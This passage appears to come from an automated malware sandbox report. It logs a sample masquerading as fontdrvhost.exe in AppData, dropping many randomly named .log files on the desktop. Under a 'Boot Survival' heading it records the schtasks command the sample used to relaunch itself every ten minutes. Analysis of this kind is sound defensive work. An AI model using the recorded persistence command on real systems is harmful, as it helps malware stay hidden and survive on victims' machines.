                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CkrRJHNx.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ldamqVhj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ZklVGaxA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\IdUqmnRm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\inkviYhq.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\XzFFzMmI.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\GspafaHt.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\maCuLVwe.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\UOaorzbP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\JavyIngh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\BxnIYuRz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ifAdEpGk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zldaSYtH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\hRSCUTxn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YnJNkaiG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\xOrrZDRn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\SdGfOIqy.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\JAxqeOaQ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zReaumVj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\qiKKKJQB.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\iKNvbzqU.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ZbufrXkm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\GPSaXBQY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\xgyKnYKq.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\msUTDNPI.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MHvzAhUM.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CTQIQVae.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\kMzdwiuP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aYVnMXzh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\QpCXcuuA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\GGiHtSpS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ouGCZwUD.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fLnmpTPV.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OEWHVhjH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\DQsQlVoZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\mJblSiJK.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WAZwZzli.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aFyNQRuY.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\SbqYhYfr.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\IsWIxvZJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\qguCdZEu.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YUSxJEkf.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\NgoGZspx.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TYRgCYum.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\sihlzJJp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\iANVPgEI.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YMjefUJa.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WgOpYqoh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\KnZYovDz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\lCADkPID.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\QfCxRbIn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\rudcNvNr.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WYfWtHNc.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ELDRalsN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\rmtKjMmm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\iJlVzTXF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YVGePHcW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\HlvZPcYC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\bAJNFhyM.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TWBYVoif.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RMfXVWDe.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\AFOsBjYP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zzDSBAiP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\hsmnhNDB.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\XEIwxBIS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\wOXBumXW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\eCwwaQCH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TORFqFIZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\JfyqGcCs.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\sYhLnqXd.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ikDUDecv.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YBjETBXN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\HuSZzPsz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\piqUgtXk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fzXEwQRC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ULtOMFWU.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\DEcjsSrF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\sQxsIGwX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aABfDneW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ipFMCTyG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RnzHiPIs.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\pntLeisv.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\VWGgLdif.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\EOpBrqDR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\mCNvXUiC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\TlbPEPXm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zTojkKNX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ZtZwWUdP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OemrfNDp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\FvSbvlyH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uHokLZDZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\LovAYRCw.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zuGjoWSN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\inpEUjnz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\XzKOkXsR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\HxFJRUCD.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\qiEMTywj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fuaVjmBB.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OnJqPAWm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\JvAHRkKP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\COTaDrJc.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\lHCvjEeO.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\bYjfzcZg.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\QkEpPQey.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\IHwzgXOR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\rAfUMkjC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\OzZYIDTF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\EQFIYaOX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\nJodFojJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\dbVNVLdb.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\AaPSReOe.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\rrvChBIx.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\hJcmyZDP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\PwAgeDiA.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\xkYbKhNl.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WuogHSdp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MLVQXpXH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\DdBAnNSZ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uztLDTCs.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\kQZvTrxL.logJump to dropped file

                        Boot Survival

                        barindex
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
